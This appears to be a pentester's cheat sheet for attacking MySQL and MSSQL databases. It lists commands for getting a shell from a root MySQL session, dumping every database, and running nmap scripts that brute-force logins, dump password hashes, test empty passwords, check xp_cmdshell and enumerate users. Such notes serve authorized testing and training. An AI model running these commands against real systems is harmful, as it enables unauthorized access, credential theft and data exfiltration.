MYSQL

Default Port = 3306

MySQL Commands : http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm


========================running as root and you have access : 
>>> mysql> select do_system('id');
>>> mysql> \! sh


=======================connecting to mssql:
>>> python3 /opt/impacket/examples/mssqlclient.py Username@$IP -windows-auth


========================Getting all the information from inside the database : 
>>> mysqldump -u admin -padmin --all-databases --skip-lock-tables


========================Nmap Scripts : 
>>> nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $IP
>>> nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $IP
>>> nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt $IP
>>> nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $IP -p 3306
>>> nmap -sV -Pn -vv --script="mysql*" $IP -p 3306


========================Username Enumeration : 
>>> nmap --script=mysql-enum --script-args userdb=<username lists> $IP
